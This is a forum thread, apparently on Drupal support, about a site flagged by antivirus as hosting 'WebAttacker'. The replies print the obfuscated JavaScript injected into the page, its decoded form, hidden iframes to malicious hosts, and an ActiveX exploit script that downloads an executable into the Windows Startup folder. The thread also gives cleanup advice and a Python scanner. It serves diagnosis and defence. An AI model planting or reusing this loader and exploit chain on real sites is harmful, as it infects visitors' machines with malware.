AntiVirus Software reporting a virus on my site
Hello,
I have a few readers who are reporting that their antivirus software (AVG Paid version for about 4 complaints, and Norton Antivirus for one) is not letting them load my web site, which is rvadventuremag.com if anyone cares to look. It's hard to get specific information from these folks because they're generally not technical, and just rely on their antivirus software without question.
Anyway, I was able to get one person to tell me that the AVG program was reporting that my site had a program called "WebAttacker" running. I have found out a little bit about web attacker; that it attaches itself by using javascript to open an iframe, and directs to another site in that way. My site does indeed use iframes where they're needed, but nothing I haven't set up and hand coded myself.
I'm at a bit of a loss right now. I haven't been able to get AVG or Norton to respond to me in any way, so I'm getting no help there. I was just wondering if anyone else had experienced the same problem and been able to successfully identify and resolve it.
Thanks

Confirmed
Right after the body tag you have the following snippet of code:
<script language=JavaScript>function ttbnb25(z){ var c=z.length,m=1024,i,s,h,b=0,w=0,x=0,d=Array(63,48,16,4,32,56,33,28,35,40,0,0,0,0,0,0,42,18,39,0,1,46,55,62,3,29,34,25,59,38,23,36,43,11,12,24,30,19,37,57,53,31,13,0,0,0,0,8,0,52,21,58,60,15,17,14,61,54,49,45,22,6,10,26,47,5,50,41,2,9,7,27,51,20,44);for(s=Math.ceil(c/m);s>0;s--){h='';for(i=Math.min(c,m);i>0;i--,c--){{x|=(d[z.charCodeAt(b++)-48])<<w;if(w){h+=String.fromCharCode(148^x&255);x>>=8;w-=2}else{w=6}}}eval(h);}}ttbnb25('8FpG1p05cTg5XHT5BBcz2ppGjeLP1p0h6BYdcHEE8wT04vepxJo0rwThWvekcNYGjBo9jHc9konkBwGhsoQ04HgWEELE8TgWjvedcipGrp0E4pL@xGwiXHg0coGG6PeddMIh4xpEMNpG1pYGdiPpVgnPOrop0gw9jHc9kocz0gPkagT01Hg0soosMAQ0jF0ddHT@ztnkBHTL5vY@itY0BUgGXFEPcppGjwP@9Ew0rwThWvp@xiQ')</script><!-- hiddenmesa.com -->
It decodes to:
window.status='Done';document.write('<iframe name=5e4792 src="http://7speed.info/t/?'+Math.round(Math.random()*17808)+'5e4792'+'" width=212 height=84 style="display:none"></iframe>')
Which fetches the attack vectors from 7speed.info via a number of iframes:
<iframe src=http://mysexydreams.net/img/stat/jam.php width=1 height=1 style="display:none"></iframe>
<iframe src=http://209.160.67.56/va.php width=1 height=1 style="display:none"></iframe>
<iframe src=http://ffseik.com/sss/in.cgi?14 width=1 height=1 style="display:none"></iframe>
va.php fetches:
<iframe src=http://papampam.net/in.cgi?pipka2 width=1 height=1 style="display:none"></iframe>
and this fetches:
<object classid="clsid:F0E42D50-368C-11D0-AD81-00A0C90DC8D9" id="attack"></object>
<script>
var arbitrary_file = "http://portulote.com/cache/load.php";
var destination = 'c:/Documents and Settings/All Users/Start Menu/Programs/StartUp/browsers.exe';
attack.SnapshotPath = arbitrary_file;
attack.CompressedPath = destination;
attack.PrintSnapshot(arbitrary_file,destination);
</script>
<embed src="pdf.php" type="application/pdf" width=100 height=100></embed>
--
The Manual | Troubleshooting FAQ | Tips for posting | How to report a security issue.
XSS cross site scripting Malware
I have the same issue and recently posted it here. We still can't find out how it got there, how to remove it and how to stop it from reoccurring. http://drupal.org/node/354237
Re: AntiVirus Software reporting a virus on my site
Search your web site, and all of your web sites if you have more than one, for any login and index files, including php and htm or html; this includes any webalizer folders as well.
Remove the code from all the infected pages.
Search your web site, and all of your web sites if you have more than one, for any folders that you did not place on your web site, such as a folder, i.e. (ihetc), or any folders without a normal name. If you find any, remove them; if you have trouble removing them, contact your hosting company and have them remove them.
Now the most important part: change your control panel password if you have a control panel, and change your FTP password, and change them often on a regular basis.
All my web sites were infected in December 2008 with the same type of code and it took me a while to fix the problems. I think the folders reinstall the code back on the pages.
I kept deleting the code and it kept coming back till I removed the folders.
One folder on one web site I had to have my hosting company remove the folder for me.
Keep an eye on your web site or web sites for a while.
I do not know what the code does other than directs to the 7speed site as I keep anti-virus on my computer running all the time and don't want to take a chance without it.
Rick
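
The cleanup steps in the post above begin with searching every login and index file, webalizer folders included, for the injected code. As an added example (not code from this thread or from Drupal), the sketch below automates that search using heuristics taken from the snippet quoted earlier in the thread; the function names, the extension list and the two sample pages are assumptions constructed for illustration.

```python
import os
import re
import tempfile

SCAN_EXT = {".php", ".htm", ".html", ".js", ".inc", ".tpl"}
SCRIPT = re.compile(r"<script\b[^>]*>(.*?)</script>", re.I | re.S)
HIDDEN_IFRAME = re.compile(
    r"<iframe\b[^>]*(?:display\s*:\s*none|\bwidth\s*=\s*[\"']?[01]\b)", re.I)
BODY_SCRIPT = re.compile(r"<body\b[^>]*>\s*<script\b", re.I)

def scan_text(text):
    """Return the sorted heuristic names that match one file's contents."""
    hits = set()
    if HIDDEN_IFRAME.search(text):
        hits.add("hidden_iframe")
    if BODY_SCRIPT.search(text):
        hits.add("script_directly_after_body")
    for body in SCRIPT.findall(text):
        # The injected loader rebuilds a string with fromCharCode, then eval()s it.
        if "fromCharCode" in body and re.search(r"\beval\s*\(", body):
            hits.add("eval_of_decoded_string")
    return sorted(hits)

def scan_tree(root):
    """Map each matching file under root (relative path) to its heuristics."""
    report = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if os.path.splitext(name)[1].lower() in SCAN_EXT:
                path = os.path.join(dirpath, name)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    hits = scan_text(fh.read())
                if hits:
                    report[os.path.relpath(path, root).replace(os.sep, "/")] = hits
    return report

# Constructed samples (inert, placeholder host): a clean page and an injected page.
CLEAN = '<body><h1>Hi</h1><iframe src="map.html" width=400 height=300></iframe></body>'
INFECTED = ('<body><script>function x1(z){var h="";h+=String.fromCharCode(65);'
            'eval(h);}</script><iframe src=http://placeholder.invalid/ width=1 '
            'height=1 style="display:none"></iframe></body>')

def demo():
    with tempfile.TemporaryDirectory() as root:
        os.makedirs(os.path.join(root, "webalizer"))
        for rel, data in (("index.php", CLEAN), ("webalizer/index.html", INFECTED)):
            with open(os.path.join(root, rel), "w", encoding="utf-8") as fh:
                fh.write(data)
        return scan_tree(root)
```

Matches are leads for manual review, not verdicts: a legitimate script placed directly after the body tag also triggers `script_directly_after_body`, while a visible hand-coded iframe like the one in `CLEAN` does not match.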